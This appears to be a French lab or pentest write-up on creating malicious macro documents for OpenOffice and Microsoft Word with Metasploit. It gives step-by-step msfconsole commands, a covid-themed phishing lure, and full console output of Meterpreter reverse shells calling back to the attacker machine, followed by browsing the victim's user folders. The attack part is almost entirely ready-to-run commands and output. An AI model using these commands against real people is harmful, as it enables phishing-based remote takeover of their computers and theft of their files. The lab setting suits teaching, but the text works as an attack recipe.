Creation des macros et démonstration de l'exploit

Nous allons dans cette partie, détailler comment créer/générer le document avec la macro. Nous montrons aussi ce qu’il se passe lorsque le document est ouvert. L’envoi avec roundcube, ainsi que la récupération des mots de passe roundcube ne sera pas détaillé ici.

open office

Version Gif

windows.gif

Création de la macro

  • liste commande
use exploit/multi/misc/openoffice_document_macro
set payload windows/meterpreter/reverse_tcp
set target 0
set srvhost 192.168.2.21
set lhost 192.168.2.21
set body "Document  covid"
exploit
  • démonstration
msf6 > use exploit/multi/misc/openoffice_document_macro

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/openoffice_document_macro) > set target 0
target => 0

msf6 exploit(multi/misc/openoffice_document_macro) > set srvhost 192.168.2.21
srvhost => 192.168.2.21

msf6 exploit(multi/misc/openoffice_document_macro) > set lhost 192.168.2.21
lhost => 192.168.2.21
msf6 exploit(multi/misc/openoffice_document_macro) > set body "Document  covid"
body => Document  covid
msf6 exploit(multi/misc/openoffice_document_macro) > info

       Name: Apache OpenOffice Text Document Malicious Macro Execution
     Module: exploit/multi/misc/openoffice_document_macro
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-02-08

Provided by:
  sinn3r <sinn3r@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Apache OpenOffice on Windows (PSH)
  1   Apache OpenOffice on Linux/OSX (Python)

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  BODY      Document  covid  no        The message for the document body
  FILENAME  msf.odt          yes       The OpoenOffice Text document name
  SRVHOST   192.168.2.21     yes       The local host or network interface to listen on. This must be an address on
                                       the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT   8080             yes       The local port to listen on.
  SSL       false            no        Negotiate SSL for incoming connections
  SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                    no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module generates an Apache OpenOffice Text Document with a 
  malicious macro in it. To exploit successfully, the targeted user 
  must adjust the security level in Macro Security to either Medium or 
  Low. If set to Medium, a prompt is presented to the user to enable 
  or disable the macro. If set to Low, the macro can automatically run 
  without any warning. The module also works against LibreOffice.

References:
  https://en.wikipedia.org/wiki/Macro_virus

msf6 exploit(multi/misc/openoffice_document_macro) > exploit 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Started reverse TCP handler on 192.168.2.21:4444 
[*] Using URL: http://192.168.2.21:8080/a7g0tk9gR
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/kali/.msf4/local/msf.odt

msf6 exploit(multi/misc/openoffice_document_macro) > jobs

Jobs
====

  Id  Name                                           Payload                          Payload opts
  --  ----                                           -------                          ------------
  0   Exploit: multi/misc/openoffice_document_macro  windows/meterpreter/reverse_tcp  tcp://192.168.2.21:4444

msf6 exploit(multi/misc/openoffice_document_macro) > [*] 192.168.2.14 - Meterpreter session 2 closed.  Reason: Died
jobs
[*] 192.168.2.14     openoffice_document_macro - Sending payload
[*] Sending stage (175686 bytes) to 192.168.2.14
[*] Meterpreter session 3 opened (192.168.2.21:4444 -> 192.168.2.14:50135) at 2022-09-13 06:48:15 -0400

Envoi de la macro

Détaillé ici

Exploit


msf6 exploit(multi/misc/openoffice_document_macro) > sessions

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  3         meterpreter x86/windows  EPITAF\Hugo @ PC01  192.168.2.21:4444 -> 192.168.2.14:50135 (192.168.2.14)

msf6 exploit(multi/misc/openoffice_document_macro) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ls
Listing: C:\Program Files (x86)\OpenOffice 4\program
====================================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  3162112   fil   2022-07-01 23:45:00 -0400  CoinMP.dll
[...]
100666/rw-rw-rw-  229888    fil   2022-07-01 23:45:04 -0400  xsltdlg.dll
100666/rw-rw-rw-  115712    fil   2022-07-01 23:45:04 -0400  xsltfilter.dll
100666/rw-rw-rw-  396800    fil   2022-07-01 23:45:04 -0400  xstor.dll

meterpreter > cd ~
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  4096   dir   2022-02-23 03:55:04 -0500  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2022-08-31 11:52:29 -0400  $WinREAgent
040777/rwxrwxrwx  0      dir   2022-02-18 17:44:15 -0500  Documents and Settings
000000/---------  0      fif   1969-12-31 19:00:00 -0500  DumpStack.log.tmp
040777/rwxrwxrwx  0      dir   2019-12-07 04:14:52 -0500  PerfLogs
040555/r-xr-xr-x  8192   dir   2022-09-14 05:38:50 -0400  Program Files
040555/r-xr-xr-x  4096   dir   2022-09-14 05:57:39 -0400  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2022-09-14 05:29:18 -0400  ProgramData
040777/rwxrwxrwx  0      dir   2022-03-12 13:17:34 -0500  Recovery
040777/rwxrwxrwx  12288  dir   2022-03-10 16:50:25 -0500  System Volume Information
040555/r-xr-xr-x  4096   dir   2022-02-26 10:59:34 -0500  Users
040777/rwxrwxrwx  16384  dir   2022-08-31 18:29:28 -0400  Windows
000000/---------  0      fif   1969-12-31 19:00:00 -0500  pagefile.sys
000000/---------  0      fif   1969-12-31 19:00:00 -0500  swapfile.sys

meterpreter > cd Users\\
meterpreter > ls
Listing: C:\Users
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  8192   dir   2022-07-01 14:36:53 -0400  Administrateur
040777/rwxrwxrwx  0      dir   2019-12-07 04:30:39 -0500  All Users
040555/r-xr-xr-x  8192   dir   2022-07-01 14:36:53 -0400  Default
040777/rwxrwxrwx  0      dir   2019-12-07 04:30:39 -0500  Default User
040777/rwxrwxrwx  12288  dir   2022-09-03 05:26:20 -0400  Hugo
040777/rwxrwxrwx  8192   dir   2022-02-26 10:59:25 -0500  MyAdmin
040777/rwxrwxrwx  8192   dir   2022-03-04 14:29:33 -0500  PC01
040555/r-xr-xr-x  4096   dir   2022-02-18 17:46:26 -0500  Public
100666/rw-rw-rw-  174    fil   2019-12-07 04:12:42 -0500  desktop.ini

meterpreter > cd Hugo\\
meterpreter > ls
Listing: C:\Users\Hugo
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2022-09-03 05:26:21 -0400  .ssh
040555/r-xr-xr-x  0        dir   2022-02-22 04:32:39 -0500  3D Objects
040777/rwxrwxrwx  0        dir   2022-02-22 04:31:56 -0500  AppData
[...]
040777/rwxrwxrwx  0        dir   2022-02-22 04:31:56 -0500  Voisinage d'impression
040777/rwxrwxrwx  0        dir   2022-02-22 04:31:56 -0500  Voisinage réseau
100666/rw-rw-rw-  1150976  fil   2022-02-22 04:31:56 -0500  ntuser.dat.LOG1
100666/rw-rw-rw-  2531328  fil   2022-02-22 04:31:56 -0500  ntuser.dat.LOG2
100666/rw-rw-rw-  20       fil   2022-02-22 04:31:56 -0500  ntuser.ini

Microsoft office word

Version gif

windows.gif

Création macro

  • Liste des commandes à faire dans msfconsole
use exploit/multi/fileformat/office_word_macro
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.21
exploit
handler -p windows/meterpreter/reverse_tcp -H 192.168.2.21 -P 4444
  • Démonstration
msf6 > use exploit/multi/fileformat/office_word_macro
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/office_word_macro) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/office_word_macro) > set lhost 192.168.2.21
lhost => 192.168.2.21
msf6 exploit(multi/fileformat/office_word_macro) > exploit

[*] Using template: /usr/share/metasploit-framework/data/exploits/office_word_macro/template.docx
[*] Injecting payload in document comments
[*] Injecting macro and other required files in document
[*] Finalizing docm: msf.docm
[+] msf.docm stored at /home/kali/.msf4/local/msf.docm

Envoi de la macro

Détaillé ici

Exploit

handler -p windows/meterpreter/reverse_tcp -H 192.168.2.21 -P 4444

On attend que cela apparaisse, cela signifie que le fichier a été ouvert et que notre exploit est connecté

msf6 exploit(multi/fileformat/office_word_macro) > 
[*] Sending stage (175686 bytes) to 192.168.2.14
[*] Meterpreter session 1 opened (192.168.2.21:4444 -> 192.168.2.14:49350) at 2022-09-26 04:48:25 -0400

À partir de la, on peut s’amuser

msf6 exploit(multi/fileformat/office_word_macro) > sessions

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  1         meterpreter x86/windows  EPITAF\Hugo @ PC01  192.168.2.21:4444 -> 192.168.2.14:49350 (192.168.2.14)

msf6 exploit(multi/fileformat/office_word_macro) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\Users\Hugo\Documents\macros_script
==============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  1524212  fil   2022-09-14 05:47:28 -0400  capture_wireshark.pcapng
100666/rw-rw-rw-  85485    fil   2022-09-26 03:37:25 -0400  msf.docm
100666/rw-rw-rw-  7717     fil   2022-09-17 17:56:57 -0400  msf.odt
100666/rw-rw-rw-  162      fil   2022-09-26 03:37:46 -0400  ~$msf.docm